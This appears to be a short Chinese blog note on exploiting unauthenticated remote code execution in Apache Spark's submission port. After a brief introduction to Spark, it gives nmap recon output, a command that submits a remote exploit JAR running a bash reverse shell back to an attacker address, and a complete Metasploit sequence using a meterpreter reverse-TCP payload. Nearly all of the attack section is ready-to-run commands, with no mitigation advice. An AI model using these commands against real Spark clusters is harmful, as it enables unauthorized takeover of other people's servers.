spark未授权RCE漏洞

• 2021 年 4 月 21 日
• 笔记
• 网络攻击防御体系

Spark简介

spark是一个实现快速通用的集群计算平台。它是由加州大学伯克利分校AMP实验室 开发的通用内存并行计算框架，用来构建大型的、低延迟的数据分析应用程序。它扩展了广泛使用的MapReduce计算模型。高效的支撑更多计算模式，包括交互式查询和流处理。spark的一个主要特点是能够在内存中进行计算，及时依赖磁盘进行复杂的运算，Spark依然比MapReduce更加高效。

Spark未授权

信息探测

nmap扫描出先如下端口开放，则很有可能

6066/tcp  open  http           Jetty 9.3.z-SNAPSHOT
8081/tcp  open  http           Jetty 9.3.z-SNAPSHOT
8082/tcp  open  http           Jetty 9.3.z-SNAPSHOT

验证如图

下载攻击组件或使用MSF

下载地址:git clone //github.com/aRe00t/rce-over-spark.git

jar工具使用说明

./submit.sh 192.168.100.2：6066 2.3.1 //github.com/aRe00t/rce-over-spark/raw/master/Exploit.jar "bash -i >& /dev/tcp/192.168.100.1/8888 0>&1"

反弹shell效果：

msf工具

msf5>use exploit/linux/http/spark_unauth_rce
msf5>set payload java/meterpreter/reverse_tcp
msf5>set rhost 192.168.100.2
msf5>set rport 6066
msf5>set lhost 192.168.100.1
msf5>set lport 4444
msf5>set srvhost 192.168.100.1
msf5>set srvport 8080
msf5>exploit